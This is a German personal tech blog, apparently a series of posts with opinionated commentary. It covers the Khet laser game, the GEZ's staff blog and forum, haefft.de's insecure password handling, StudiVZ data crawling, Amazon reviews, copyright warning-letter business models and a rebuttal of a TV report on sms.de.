Kaufen wollte ich das schon lange. Eigentlich bei thinkgeek aber da haben mich immer Zoll und Versandkosten abgeschreckt da der Shop in den USA ist (und ich hätte natürlich gleich ne mega Bestellung aufgegeben).

Wie dem auch sei, getdigital brintgt den Kram irgendwann nach Deutschland und ich kauf’s dann halt dort.

Aber zurück zum Spiel.

Das “Khet Laser Game” ist DAS Spiel für Geeks. Warum? Nun, fragen wir doch mal Doctor Evil.

Richtig! Wie der Name des Spiels überhaupt nicht vermuten lies ist es mit Lasern ausgestattet. Und Laser sind nunmal einfach cool und nerdig und überhaupt total toll.
Worum geht es? Das Spiel hat eine gewisse Ähnlichkeit mit Schach (darum nennen wir es intern auch gerne “Laser Schach”). Ziel ist es den gegnerischen König (eigentlich Pharao – das Spiel ist ägyptisch angehaucht) mit seinem Laser (oder dem des Gegners) zu treffen und seinen eigenen König zu beschützen. Dazu stehen dem Spieler Spiegel zur Verfügung die er auf dem Spielfeld bewegen und drehen kann um den Laserstrahl in die gewünschte Richtung zu lenken.

Folgende Spielfiguren stehen zur Verfügung:
Pharao: Der König, wird er getroffen verliert man
Obelisk: Werden zerstört wenn sie von einem Laser getroffen werden. Bieten temporären Schutz und können gestapelt werden.
Einfacher Spiegel (Pyramide): Lenkt einen Laserstrahl um 90 Grad. Wird zerstört wenn die nicht-spiegelnde Fläche von einem Laser getroffen wird.
Doppel Spiegel: Kann den Platz mit Obelisken und Pyramiden tauschen und hat auf beiden Seiten einen Spiegel der den Laserstrahl um 90 Grad ablenkt. Kann daher nicht zerstört werden und ist analog zum Schach so etwas wie die Dame.

Das Spiel beginnt mit einem Grundaufbau. (die Basisregeln enthaltten 3 Aufbauten aber man kann sich natürlich auch welche ausdenken). Anschliessend machen die Spieler abwechelns ihren Zug. Ein Zug besteht aus:
1. Eine Figur bewegen oder Drehen.
2. Laser feuern.

Die Figuren können entweder um ein Feld(auch diagonal) bewegt oder um 90 Grad gedreht werden. Anschliessend MUSS man den Laser auf seiner Seite betätigen.

Das war im Prinzip schon das ganze Spiel. Klingt total simpel und ist es auch. Der Teufel steckt aber im Detail. Easy to learn, hard to master. Die ersten Züge macht man noch recht schnell, im weiteren Verlauf des Spiels muss man aber höllisch aufpassen und sämtliche Kombinationen vorrausberechnen die sich durch den eigenen Zug ergeben können. Man muss sowohl auf den Laser des Gegners, als auch den eigenen achten. Ist tatsächlich schon passiert, dass man sich aus unachtsamkeit selbst abgeschossen hat (oder der Gegner so klug gesetzt hat, dass man dies gar nicht vermeiden konnte).
Zudem kann sich das Blatt jederzeit wenden. Mir selbst ist nun schon mehrfach passiert, dass ich dem Gegner Figur um Figur zerstört habe und dabei meine eigene defensive vernachlässigt habe. Nur darauf fixiert den gegnerischen Pharao zu erwischen habe ich meinem Gegnerspieler zu viel raum gegeben. BAM und ich war tot.

Man sollte übrigens viel Zeit mitbringen. Eine Partie kann nach 10 Minuten vorbei sein aber auch mal mehr als eine halbe Stunde dauern. Hängt natürlich davon ab wie lange die Spieler überlegen. Firmenintern gehen wir wohl bald dazu über mit einem Timer zu spielen. Zumindest werde ich gegen manche Leute nicht mehr ohne Spielen. will auch mal was anderes am Tag machen als auf denn Zug zu warten.*g*
Solltet ihr das Spiel irgendwo spielen wo andere Leute rumlaufen (z.B. im Büro), stellt euch aber drauf ein andauernd jemanden dabei zu haben der zuschaut und sich das Spiel erklären lassen möchte. Dauert zwar nicht lange, lenkt aber ab.

Die eruopäische Version des Spiels ist übrigens quasi geschnitten. In dieser Version sind Level 1 Laser verbaut, in den USA sind es Level 2 Laser. Das war aber auch schon der einzige Unterschied. Ob sich das wirklich auswirkt kann ich nicht sagen. Auch wenn es eigentlich klar ist sage ich es hier aber auch nochmal: Man kann die Laser natürlich nicht sehen! Man sieht nur den Auftrittspunkt. Um den Strahl sichtbar zu machen brauch man Rauch oder ähnliches. Hier sind Raucher mal im Vorteil. Da mein Spiel das Büro nie verlassen hat(einige würden sonst echte Entzugserscheinungen bekommen) habe ich den Laser bis heute selbst nicht gesehen.

Das einzige was stört ist die Ungenauigkeit der Spiegel. Die Teile sind nicht immer 100%ig ausgerichtet und so weicht der Laserstrahl immer weiter von der Stelle ab auf die er eigentlich treffen sollte. Irgendwann trifft er einfach nicht mehr auf die Spiegel. So sind leider lustige Aufbauten wo der Laser jeden Spiegel einmal trifft nicht zu realisiseren. Bei etwa 6-7 Reflektionen ist Schluss. Im Grundspiel erreicht man diese aber auch selten. Nur bei den Erweiterungen kann das durchaus mal passieren, dass mehr Spiegel involviert sind. Da hilft leider nur nachprüfen.

Hier noch ein paar Bilder (will die ja nicht umsonst gemacht haben):
1: Spiel gerade angefangen

2: Chef spielt mit dem Azubi

3: Seitenansicht

Für das “Khet Laser Game” sind bereits zwei Erweiterungen erschienen:

Eye of Horus: Liefert 2 halbdurchlässige Doppelspiegel. Das bedeutet: Die Laserstrahlen gehen zum teil durch und werden zum teil umgelenkt. Aus einem Laserstrahl erhällt man nun 2 Laserstrahlen. Großartig! Ist aber auch der totale Brainfuck.

Habe mir die Erweiterung in Österreich bei gameware.at bestellt. War das letzte Exemplar.

Hier mal 2 Bilder mit eingezeichnetem Laser (die oben abgerundeten Steine sind die Splitter):

1. Grundaufstellung:

2. Hier verliere ich gleich eine Pyramide und einen Obelisken auf einmal

Tower of Kadesh: Oder auch “Khet 3D”. In dieser Erweiterung gibt es einen großen Turm auf den die Laser mit integrierten Spiegeln gelenkt werden. Auf dem Turm gibt es eine weiitere Spielfläche. Zudem kann man den ganzen Turm (mit allem was darauf steht) auf dem Spielfeld bewegen.

Den Tower of Kadesh habe ich bisher noch nicht im europäischen Versand finden können. Werde wohl mal bei getdigital anfragen ob sie den demnächst auch mal ins Sortiment aufnehmen.

Das Grundspiel kann man hier für 49 Euro kaufen.
Falls jemand aus Duisburg und Umgebung mal ne Lust auf ne Runde hat lässt sich da vieleicht was einrichten.

Getwittert hab ich das ja vor kurzem schon mal, bezog mich da aber auch nur auf einen etwas älteren Tweet von Graham Linehan. Nun hat er es aber auch nochmal ganz offziell auf seinem Blog geschrieben. Wunderbar!

Danke an nerdcore wo diese Nachricht mal wieder unter das Nerd Volk gebracht wurde und danke an @SvenEwers der mir das per Twitter gesteckt hat. (blöderweise hab ich’s viel zu spät gelesen, da wegen Erkältung mehr DVD geschaut als am Rechner gesessen)

Hoffe die drehen nicht zu lange. Will sehen!!!!! Aber wir planen schonmal ein paar IT Crowd Wochenenden ein um die ersten 3 Staffeln vorher nochmal zu schauen.

PS: Könnten die ganzen Kommentarspammer sich bitte verpissen? Meint ihr eigentlich das ist nicht auffällig wenn ihr hier mit nem Einzeiler kommentiert, dabei auf eure Immobilien, Casino und sonstwas Seiten verlinkt und dabei dann sogar in diesem Einzeler noch Keywords unterbringt die nichts mit dem Thema zu tun haben?

Ich sag mal so:
Es gibt Blogs in denen Leute ihren privaten Kram reinschreiben (”War gestern bei Aldi und da war’s voll doof”).
Es gibt Blogs mit bestimmten Themen.
Es gibt Blogs die als News Seite fungieren.
Es gibt Webseiten die zumindest auf Blog-Software basieren.
Es gibt Firmenblogs.
… und es gibt FAKE Blogs.

Und nun ratet doch mal zu welcher Kategorie der GEZ Blog gehört?

Ich zitiere mal die Einleitung der sogenannten Mitarbeiter Blogs:

Der Mitarbeiterblog ist unser „Tagebuch“ als GEZ-Mitarbeiter:…Wir bloggen aus Spaß an der Freude. Hinter den Blogeinträgen steht nicht die GEZ, sondern wir Mitarbeiter selbst.

Soso…ist ja nett.
Aber mal so unter uns: WEN WOLLT IHR VERARSCHEN?

Das ganze Geschreibsel im GEZ Blog ist pures Marketing. Kein Mensch schreibt so. Das ganze gehört zur Image Kampagne. Und da bei Kampagnen mit festen Zielen der Faktor “echter Mensch” einfach zu unberechenbar ist muss der halt unter den Tisch fallen.
Behaupte ich einfach mal.

Man lese sich diese “Tagebuch Einträge” bitte einmal durch.
Werbung Werbung Werbung.

Vera Z. schreibt im ersten Beitrag:

Ich freue mich über die Gelegenheit, in direkten Kontakt treten zu können, Fragen zu beantworten, Denkanstöße zu geben, zu diskutieren, zu erklären und aufzuzeigen, dass die GEZ eine super Firma ist! Hier arbeiten Menschen, die sich um jeden Brief, jedes Telefonat Gedanken machen und versuchen zu helfen…. Jedes einzelne Teilnehmerkonto ist anders, jeder Teilnehmer unterschiedlich, kein Brief wie der vorherige. Die Sachverhalte erfordern oft „Sherlock Holmes Qualitäten“.

Ja ne is klaa Sherlock.

Besser wird’s mit Daniela K. die davon erzählt wie sie einen netten Mann auf einer Party kennengelernt hat der sie angesprochen hat weil sie bei der GEZ arbeitet.
Sie beendet ihren Beitrag so:

Ich hätte nie gedacht, dass mein Job derartiges Interesse bei meinen Mitmenschen wecken könnte. Die geschilderte Situation ist kein Einzelfall. Wenn Ihnen mal auf einer Party der Gesprächsstoff ausgehen sollte, dann diskutieren Sie doch einfach mal über die GEZ. Sie werden überrascht sein.

Mach ich andauernd. Fokussiert den gesamten Hass aller anwesenden auf das Selbe.
Und natürlich ist es verwunderlich, dass Mitmenschen ein reges Interesse an der Arbeit der GEZ haben… wenn man seit 10 Jahren hinter’m Mond lebt und nicht mitbekommen hat, dass die GEZ in Deutschland auf der Unbeliebtheits-Skala noch vor Osama Bin Laden steht.

Sieht Anja M. natürlich nicht so.

Es mag vielleicht seltsam klingen, aber es ist ein interessanter, vielseitiger Job, der ganz bestimmt nie langweilig wird!

Ich weiß ganz genau, welche Themen den Rundfunkteilnehmern unter den Nägeln brennen und freue mich, dass wir hier zusammenkommen, um regen Meinungsaustausch zu pflegen und natürlich auch zu diskutieren. Daher hab ich auch sofort “hier” gerufen, als es darum ging, einen Webblog zu starten.

An dieser Stelle sie mal kurz angemerkt, dass es zwar schon einige Kommentare gibt aber noch keine einzige Antwort. Der selbe Einbahnstrassendialog wie schon im GEZ Forum.

Neuster Eintrag von heute von Conny A. handelt vom Abmelden.
Kurz zusammengefasst: Ist doch alles total unkompliziert.

Ja, ich finde objektorientierte Programmierung mit PHP 5.3 auf MVC Basis und Anbindung an eine PostgreSQL Datenbank auch nicht kompliziert. Ich mach den scheiss aber auch dauernd.

LIebe Leute von der GEZ: Benennt das Ding um in eine FAQ oder sonst was. Aber hört auf diesen Marketingscheiss Blog zu nennen. Wenn ihr jetzt auch noch versucht im Netz die Leute zu verarschen werden diese nämlich ganz schön sauer. Und das ist wohl kaum das was ihr mit eurer Image Kampagne erreichen wollt.

Und nehmt auch gleich eure bezahlten Postings aus eurem Forum. Meint ihr etwa es merkt keiner, wenn im Forum rein zufällig genau die Leute die sich nach dem Namensschema “vorname .X” benannt haben Lobgesänge auf die GEZ anstimmen und dann auch rein zufällig auch so einen komischen Werbe-Schreibstil haben?

Gehasst seid ihr eh schon, hört auf euch auch noch lächerlich zu machen.

PS: Wer sich das Eldend selbst antun möchte: Hier

Neue webseite: Mir egal.
Blog in dem sich GEZ Mitarbeiter äussern: Lachhaft, die Beiträge da sind in etwa so authentisch wie die Recherchen der öffentlich rechtlichen zu Computerspielen.

Aber das GEZ Forum ist der Knaller in Tüten. Es ist das erste (zummindest mir bekannte) Forum mit ÖFFNUNGSZEITEN!
Jawohl, das GEZ Forum ist nur Werktags von 8-22 Uhr geöffnet. Ausserhalb der Öffnungszeiten kann man dort nicht schreiben, sondern nur lesen. FAIL!

Natürlich ist das Forum auch die ganze Zeit moderiert. Mindestens 12 Moderatoren, die von unseren GEZ Gebühren bezahlt werden(ebenso wie die ganze Seite und auch die Entferung des Copyright Hinweises im Forum), sitzen dannn von 8-22 Uhr dort und passen auf, dass keine was böses schreibt. Just in diesem Moment haben die auch alle Hände voll zu tun.

Denn was machen Leute wenn sie eine Idee(wie z.Ba. Öffnungszeiten für ein Forum) im Netz für totale Scheisse halten? Und vor allem wenn sie einen Seitenbetreiber bzw Forumsanbieter eh nicht leiden können? Sie spammen!

Es ist nicht davon auszugehen, dass das GEZ Forum die Woche überlebt. Derzeit sind etwas über 1600 benutzer online von denen 1598 nur Müll schreiben.
Das GEZ Forum erstickt gerade zu im Spam und die Moderatoren kommen mit dem löschen kaum noch hinterher.

Albern? Ja!
Verdient? Ja!

Das verhalten der Nutzer ist absolut kindisch aber die GEZ ist selbst Schuld.
1. Als eine der meistgehassten Organisationen(was genau sind die eigentlich?) in Deutschland ein Forum aufzumachen… das ist als würden die zeugen Jehvoas einen Infostand in Wacken direkt neben der Black Metal Stage eröffnen.
2. Ein Forum mit Öffnungszeiten ist mal so was von fail… allein für diese Blödheit ist der Spam verdient.
3. Nur ein einziges Unterforum und kein SPAM Forum wie es das überall sonst gibt.

Aber noch halten die Modeartoren des GEZ Forums tapfer durch. Mich würde mal eine DPM Anzeige interessieren. DPM= Deletes per Minute.
Frage ist wie lange noch. Bzw wie lange haalten Server und Datenbank das aus? Der Datentyp “integer” könnte für die IDs bald schon knapp werden wenn das in dem Tempo weitergeht.

Ich glaube so mancher Marketingmanager würde weinen vor Freude wenn schon am ersten Tag ein Forum so gut besucht ist.

Achja: Zum Forum geht es hier

Der entsprechende Heise Artikelt steht hier

PS: Für die Kommentare: ich weiss, dass niemand die GEZ mag aber achtet bitte ein wenig auf eure Wortwahl.

Nun… ich kann nicht ganz leugnen, dass ich als “mit Windows zocken” und “mit Linux basteln” Mensch tatsächlich so in etwa das Apple Gedöns sehe (mehr aus Sicht des Microsoft Fanboys).

An dieer Stelle dann einfach mal ein herzliches Fuck You an ALLE Fanboys die dauernd meinen überall ihren Senf dazugeben zu müssen (vor allem im heise Forum) ohne sich auch nur Ansatzweise mit dem gerade besprochenen Thema auseinandergesetzt zu haben.

via nerdcore

So zumindest behauptet es der Brief den ich heute erhalten habe. (mir wäre es eigentlich lieber wenn mein Adsense Account das behaupten würde)

Und das mit nur etwas über 200 Besuchern am Tag.

Ich gehöre zu den vielen “handverlesenen” Webseitenbetreibern die angeschrieben wurden ihre Seite nun auch als co.de Domain zu registrieren.
Yeah, fieser-admin.co.de wollte ich schon immer haben. Und das für nur 99 Euro im jahr. 99 Euro für ne Subdomain. Ein Spottpreis!
Der Brief vergleicht das ganze mit co.uk … okay, das hat zwar überhaupt nix miteinander zu tun aber meinetwegen.*g*

Den Rest dazu kann man sich bei heise durchlesen.

Nenene… dieses 2-Buchstaben Domains waren echt ne beknackte Idee.

Und warum nicht die ganze Welt das kennt?

Horst Evers: Jan

via MeyJu Blog

Würde mich ansich ja nicht sonderlich jucken bzw. wäre mir keine extra Erwähnung wert.

Nun habe ich bei im Bericht von netzpolitik aber einen kleinen Auszug aus dem Statement des CCC gelesen wo ich mich echt fragen muss wer bei haefft für die Datenbanbank verantwortlich ist. Der 3 jährige Sohn des Inhabers?

So heisst es im CCC Statement:

Der Sprecher des CCC, Dirk Engling, faßt das Problem plastisch zusammen: “Persönliche Daten sind wie Plutonium. Wenn zuviele davon auf einem Haufen liegen, wird es kritisch.” Zu den technischen Details konstatiert er: “Die Entwickler bei haefft.de haben sich dabei so ziemlich alle Anfänger-Programmierfehler geleistet.” Die Kennwörter waren nicht wie üblich gehasht, sondern im Klartext gespeichert. Zudem wurden sie mit dem ILIKE-Operator nur auf Ähnlichkeit verglichen, so daß sich die Paßwort-Abfrage mit einfachsten Mitteln umgehen ließ. Die Eingabedaten des Benutzers wurden ungefiltert als Befehl an die Datenbank weitergereicht. Marktübliche Techniken zur verschlüsselten Übertragung der Zugangsdaten wie HTTPS scheinen bei haefft.de unbekannt.

Äh… WTF?
Speicherug um Klartext?
LIKE OPERATOR!?!?!?!?!?!?!!?
select user from user_table where password like ‘%a%’ ?
Besoffen? Das ist in der Tat schon grob fahrlässig. Da kann man die Daten auch gleich auf die Startseite schreiben.

Alter…

Laut netzpolitik gab es von haefft.de auch eine (inzwischen gelöschte) Presseerklärung:

Der wichtigste Sicherheitsaspekt von Haefft.de ist dem technikorientierten CCC aber vermutlich nicht bekannt. Seit 2000 arbeiten wir mit einem engagierten Netz an Haefft.de-Moderatoren, die sich nach besten Kräften darum kümmern, dass in den Foren und im Chat kein Platz für sexistische, gewaltverrlichende, rassistische oder sonstwie jugendgefährdende Inhalte ist. Diese “Haefft.de-Mods” leisten eine tolle Arbeit und sind unserer Überzeugung als Ergänzung um ein Vielfaches wichtiger als die 100%-Technik-Optimierung, die es vermutlich ohnehin nie geben wird.

LOL… 100% Technik Optimierung… 10% Sicherheitsstandards würden vorerst ja reichen.

Nix kapiert, setzen, sechs.

Benutze Kopf mit Wand…

Jawohl, ich verteidige hier StudiVZ (und meinVZ und SchülerVZ).

Zumindest bei den Punkten wo das Gemopper einfach völlig unangebracht ist.

In den letzten Wochen waren die Schlagzeilen wieder groß “Datenleck bei StudiVZ – tausende von Profilen ausglesen”. Und nun wieder ein Artikel bei der Frankfurter Rundschau. Jaja, die bösen bösen Crawler.

Keine Frage, wenn dort Datenbanken ausgelesen werden mit Informationen die nicht öffentlich sind dann ist das ein Datenleck. Und das muss geschlossen werden.

Aber es ist nunmal absolut kein Leck wenn Daten gesammelt werden die frei einsehbar sind. Denn was öffentlich ist bestimmt der Nutzer dort nunmal selbst.

So schreibt die FR z.B.

Viele Studenten fürchten zudem, dass potenzielle Arbeitgeber ihre Fotos auf MySpace, Facebook oder StudiVZ entdecken könnten. Die Alkoholleiche in der hinteren Ecke der Party beeindruckt vielleicht die virtuellen Freunde – den Personaler jedoch sicher nicht.

Und Markus Beckedahl (netzpolitik.org) wird zitiert:

Es ist eine Sache, ob jemand per Hand ein paar Profile kopiert – oder ob sie automatisch millionenfach ausgelesen werden

Und hier muss ich Markus wiedersprechen. Denn ich sage: Pech gehabt. Die Nutzer haben selbst entschieden ihre Fotos da zu veröffentlichen. Wenn diese nicht auf “privat” gestellt sind gibt es da von mir absolut kein Mitleid. Denn dann hätte auch ein Crawler keine Chance.
Beschwer ich mich etwa darüber, dass ich Ärger bekommen könnte weil ich hier etwas schreibe was meinem Arbeitgeber nicht passt? Ich muss es ja nicht öffentlich machen.

Ob die Daten nun händisch ausglesen werden oder per Crawler (der im ürbigen wirklich nicht sehr schwer zu programmieren ist): Es sind alles nur die Daten die ich selbst direkt oder indirekt über mich preis gegeben habe. Wenn ich öffentlich mein Geburtstdatum hinterlege darf ich mich nicht beschweren, dass jeder nachschauen kann wie alt ich bin. Wenn ich alle meine Arbeitskollegen im Netzwerk als Freunde angebe darf ich mich nicht wundern, dass jemand dadurch herausfinden könnte wo ich arbeite.

Ich finde StudiVZ scheissse. Punkt. Aber ich find’s einfach so scheisse und nicht weil ich selbst zu dämlich verantwortungsvoll mit meinen Daten umzugehen. Leute die öffentlich alles über sich schreiben und ihre Fotos veröffentlichen und sich dann beschweren, dass sie deswegen Ärger bekommen könnten sind mir echt die liebsten.

Was kommt dennn als nächtes? “Datenleck im Telekommunikationsbereich – Tausende von Telefonnummern im Telefonbuch veröffentlicht”.

Also: Datenlecks bitte auch nur da kritisieren wo die Daten gar nicht zugängllich sein sollten und nicht dort wo User einfach nur auf “Okay” geklickt haben ohne nachzudenken.

Bashed die User, nicht den Betreiber.

Ich musste eben doch mal herzhaft lachen. Amazon und die Produktbewertung von Kunden… ich lese ja grundsätzlich immer erst die 1-Sterne Bewertungen. Bei DVDs findet man da den Hinweis ob die angepriesene “special extendet uncut version” nicht doch wieder eine für Deutschlands sensible Bürger geschändete Version ist bei der 5 Minuten fehlen.

Heute habe ich keine DVD gesucht(die drei ungeschnittenen DVDs die man bei Amazon bekommt habe ich der Verwandschaft schon als Wunschzettel für wiehnachten zukommen lassen*g*). Ich habe mal ein wenig nach Notebooks gestöbert.

Genauer gesagt nach einem Notbeook OHNE Windows. Windows hab ich im Büro, Windows hab ich zuhause und sollte ich Windows auf nem Notebook haben wollen könnte ich auch einfach eine von den Lizenzen nehmen die hier rumliegen. Dafür brauch ich nicht nochmal zahlen.
Also schau ich nach Notebooks mit vorinstalliertem Linux(ganz ohne BS gibt’s ja nicht).
In diesem Fall fiel mein Augenmerk auf ein Notbebook von Asus. Kurz überfloegen… hmmm über 80 5 Sterne bewertungen. Und 5 mal 1 Stern. Let the Flamewar begin.

Amazon scheisse, Asus scheisse… blahblah.
Zwei bewertungen befassten sich aber dann doch mit dem produkt selbst.

Bei der hier ist aber echt extreme facepalm angesagt:

Superschneller Versand, wie ich das von Amazon gewohnt bin. Aber: Notebook ist von einem Laien nicht betriebsbereit zu bekommen. Es wird ein Login verlangt und danach ein Passwort, wobei man dieses nicht eingeben kann,da der Cursor sich bei einer Eingabe nicht bewegt, also muss das System neu initiiert werden, welches für einen Laien unmöglich ist. Das Notebook an sich macht einen ordentlichen Eindruck. Aufgrund des ungenügenden Auslieferungszustandes ergibt sich als Bewertung für mich leider nur die Note Mangelhaft.

Benutze Kopf mit Wand…
Okay, ein Laie weiss vieleicht nicht, dass der Cursor sich aus Sicherheitsgründen nicht bewegt wenn man das Passwort eingibt… aber Laien sollten deshalb auch kein Notebook kaufen in dessen Beschreibung so was steht:

Software (vorinstalliert): kommandozeilen-basiertes Linux, keine grafische Oberfläche.

Der zweite Kritiker hätte dieses Detail vieleicht auch vorher mal lesen sollen:

Hatte mich anfangs darauf gefreut, endlich dieses Notebook zu haben. Beim ersten hochfahren musste ich jedoch feststellen, dass die X-Server-Config zerschossen war und die grafische Oberfläche nicht starte (Weitere Erklärungen dazu spar ich mir). Kurzer Hand suchte ich eben andere Optionen, womit Ubuntu als neues Betriebssystem nahe lag. Kein Thema – installiert. Läuft auch alles.

Von welcher grafischen Oberfläche wird da geredet?

In diesem Zusammenhang such ich auch Empfehlungen für ein Notebook.
Anforderungen:
Mindestens 15 Zoll Display (kein netbook)
Maximal 400 Euro
Linuxkompatible Hardware (soll Ubuntu drauf laufen)
Linux darf auch vorinstalliert sein (von Anfang an lauffähig iss halt schön)

Ich möchte auf dem Teil arbeiten (Webentwicklung) und nicht zocken (allenfalls das uralte Unreal Tournament o.Ä.). Ich brauch also keine Shader 4 Grafikkarte.

Acer und Asus bieten in der Preisklasse Geräte an. Hat da jemand Erfahrungen?
Ich würde mich auch über bezugsquellen freuen.
Ausser http://www.hardwareshop-linux.de/ – die hab ich selbst gefunden.

Diw wirklich perversen Dinge spielen sich direkt hier in Deutschland ab.

Das Anwälte sich mit Abmahnungen bereichern ist jedem klar.
Das da wesentlich mehr Geld fliesst als überhaupt nötig weiss auch jeder.

Inzwischen wird die Abmahnung von illegal heruntergeladenen Multimedia Daten aber schon als Geschäftsmodell verkauft um den Gewinn zu steigern.

Ey, das ist doch krank…

So ist nun eine Präsentation der DigiRights Solution GmbH aufgetaucht.

Diese Firma ist spezialisiert darauf Urheberrechtsverletzungen in Tauschbörsen zu entdecken und die Downloader abzumahnen.

Gegen Ende der Präsentation wird wunderbar vorgrechnet wie lohnend das abmahnen doch ist:

ca. € 0,60 (netto) pro legal verkauftem Download gegenüber € 90,00 pro erfassten illegalen Download bei Rechtsverletzern, die zahlen

Der Ertrag bei erfassten und bezahlten illegalen Downloads ist das 150 fache!
Das bedeutet: Wenn 1.250 Rechtsverletzer erfasst werden, die zahlen, müssten zur Erwirtschaftung des entsprechenden Ertrages 150.000 Downloads legal verkauft werden

Die Abmahnung ist als Instrument gedacht einen Streit aussergerichtlich beizulegen. Quasi als “Du Du Du! Fingerzeig”
Aber was die DigiRights GmbH hier macht ist an pervertierung des Grundgedankens gar nicht mehr zu überbieten. Da werden Gewinne durch Abmahnungen berechnet.

Ich setzt da zwar wenig Hoffnung in die FDP aber es wäre schön wen die Politik sich dem Abmahnverfahren in Deutschland mal annehmen würde. So war das ganze nicht gedacht und ich halte das auch für alles andere als legal. Das ist gleich noch ne Stufe höher als die sogenannten “Abmahnanwälte”.

Dem muss ein Riegel vorgeschoben werden. Was kommt den als nächtes? Studios die ihre Filme/Musik absichtlich in Tauschbörsen gelangen lassen damit man mehr Gewinn herausholt?

Ich schwanke gerade echt zwischen Brechreiz und “einfach mal gepflegt Leute umklatschen”. Gut, dass Darmstadt nicht in der Nähe ist.
Künstler ansprechend entlohnen… bullshit. Gewinnmaximierung ist alles worum es geht und sei es auch mit Mafia Methoden.

Das ganze Dokument findet man unter Wikileaks.

Vielen Dank an Gulli.com die diese Schweinerei aufgedeckt haben.
Und auch an netzpolitik wo ich zuerst davon erfahren habe.

PS: In diesem Artikel handelt es sich lediglich um eine Meinung. (muss man ja dazuschreiben, sonst verdient noch jemand durch Abmahnung an meinem Beitrag)

So meint zumindest das ZDF

Au man, was für ein Versprecher… das tut echt schon weh.

Hintergrund sind phishing Attacken gewesen mit denen die Zugangsdaten zu mehreren tausend E-Mail Konten ergaunert wurden.

Es gibt auch schon eine Top Ten der am meisten benutzen Passwörter:

Die zehn häufigsten Passwörter der Liste waren: 123456, 123456789, alejandra, 111111, alberto, tequiero, alejandro, 12345678, 1234567 und estrella.

heise

Mein Mitleid tendiert gegen -50. Wer auf Phishing hereinfällt und dann auch noch solche Passwörter benutzt der hat es überhaupt nicht anders verdient. Dem gehört der Rechner eh weggenommen.

Nun hat das ZAPP Magazin sich der Sache angenommen und einen Beitrag dazu veröffentlicht. netzpolitik.org hat das ganze nochmal im Blog veröffentlicht.
Nun sieht das ganze ziemlich übel aus. Unerwünschter Massenspam, ungültige Klauseln in AGBs bei SMS Diensten etc.
Unter anderem wird dort auch von sms.de berichtet die dort auch alles andere als gut wegkommen.

Hier erst einmal der Bericht:

Nun hat sich in den Kommentaren aber einer der Geschäftsführer von sms.de gemeldet und ist mal ziemlich angepisst weil die Reportage schlecht recherchiert ist.

Kommentar Nr 4 von Tim Mois

Ich bin dem mal nachgegangen.

Ab 2:10 im Video wird folgendes behauptet:

Wer sich hier anmeldet muss deren Nutzungsbedingungen aktzeptieren. Dort steht, dass die Firma anderen Firmen Telefonnummern weitergeben darf. Zur zielgerichteten Werbung.

Das ist schlicht und ergreifend falsch!

Dort steht:

(3) Mit der Registrierung stimmt der Nutzer ausdrücklich zu, dass allgemein gehaltene Informationen über den Nutzer und dessen Verhalten Werbekunden und Kooperationspartnern zur Verfügung gestellt werden dürfen. Dies gilt der zielgerichteten Werbung, z.b. im Online-Bereich oder per SMS.

Da steht kein Wort von Telefonnummern sondern es heisst “allgemein gehaltene Informationen”.
Zum Verständnis: Zielgerichtete Werbung besagt, dass statistische Daten erhoben werden anhand derer man Werbung besser auf den Empfänger abstimmen kann. Im Onlinebereich ganz einfach gesagt: Wer sich viel auf Handy Seiten herumtreibt ist eher an Handy Werbung interessiert als an Werbung für Waschmaschinen.

Desweiteren heisst es in den AGBs (direkt über dem Abschnitt):

(1) Im Rahmen der Registrierung werden von sms.de Personenbezogene Daten erhoben. Diese werden ausschließlich zum Zwecke der Vertragsabwicklung und Kundenbetreuung, sowie zu internen Untersuchungen genutzt. Hierzu zählen u.a. Informationen über Demographie, Interessen und Nutzer-Verhalten. Der Nutzer erklärt hierzu sein Einverständnis.
(2) sms.de veröffentlicht keine persönlichen Informationen der Nutzer zur Identifizierung, außer der Nutzer hat seine ausdrückliche Genehmigung dazu gegeben.

Wenn sich 1 und 3 zuerst zu wiedersprechen scheinen sei angemerkt: Nutzer X hat sich für Handy Y interessiert und Handy Z gekauft ist personenbezogen – 70 von 100 Nutzern haben sich für Handy Y inteessiert und Handy Z gekauft dagegen nicht.

So versteh ich das zumindest. Und da ich selbst für eine online marketing Firma arbeite (ja, nun werft schon eure Tomaten) kannn ich auch sagen, dass letzteres auch die einzige Information ist die Werbetreibende wirklich interessiert.

Desweiteren wurde im Kommentar dargestellt, dass Nutzer nur Werbe SMS bekommen wenn sie das im Kundenbereich extra bestätigen. Und die bestätigung der Handynummer erfolgt durch double opt-in.

Hier ein Screenshot (den hab ich nicht selbst gemacht aber ich will mich da auch nicht anmelden)

Und hier noch ein Auszug aus den AGBs: §10 Absatz 7:

Partnerunternehmen von sms.de, die den Inhalt der Werbe-SMS bestimmen, erhalten in keinem Fall personenbezogene Daten des Nutzers von sms.de; vielmehr werden in allen Fällen die SMS von sms.de direkt verschickt, ohne daß die Mobilfunknummern oder andere Daten an Dritte weitergereicht werden.

Warum schreibe ich das ganze hier nun? Ich will weder Werbung für sms.de machen, noch die FDP komplett entlasten.
Aber wennn man auf der Bildzeitung und anderen Medien wegen schlechtem Journalimus rumhackt muss das auch für Magazine gelten die, meiner Meinung nach, ansonsten eher sehr gute Beiträge veröffentlichen.

Denn das was im Video über die Herausgabe von Daten und die AGBs gesagt wird stimmt nunmal nachweislich nicht. Aus dem gezeigten Abschnitt zum Datenschutz kann man vieles herauslesen und missinterpretieren. Aber von Telefonnummern steht da nichts und das sollte jeder, der der deutschen Sprache mächtig ist, auch sehen.

Ich hoffe das klärt sich irgendwie auf. Aber momentan bin ich von ZAPP äusserst enttäuscht. Denn das war Bildzeitungsniveau (liebe Bild, das ist meine persönliche Meinung zur Qualität eurer Berichterstattungen und keine Tatsachenbehauptung, spart euch das Geld für den Anwalt).

PS: Ich hoffe ich habe jetzt auch wirklich überall FDP stehen… beim erstellen stand zuerst FTP im Titel…

Hiermit nehm ich dann mal an der Verlsoung teil. (ja, ich prostituiere mich gerade ein bischen*g*)

Zur Verlosung geht es hier.

Bei spiegel.de prangt derzeit ein Werbebanner von Conrad mit Steinmeier als Werbeträger.

Zusammen mit dem Text konnte ich mir vor dem Hintergrund der Wahl ein grinsen nicht verkneifen.

Unglückliche Textwahl oder derber Humor?

Die SPD hat erwartungsgemäß derbe auf’s Maul bekommen.
Die CDU ebenso aber mit der FDP reicht es halt für ne Regierung.

Mir gruselt’s bei dem Gedanken… aber nunja, die FDP hat klare Worte gesprochen im Wahlkampf. “Zensursula wird abgeschafft wenn wir gewählt werden.”

Nun, nach ihren Taten wollen wir sie richten. Ich schau dennoch schon mal wo man günstig Guillotinen bekommt.

Tja, und die Piraten?

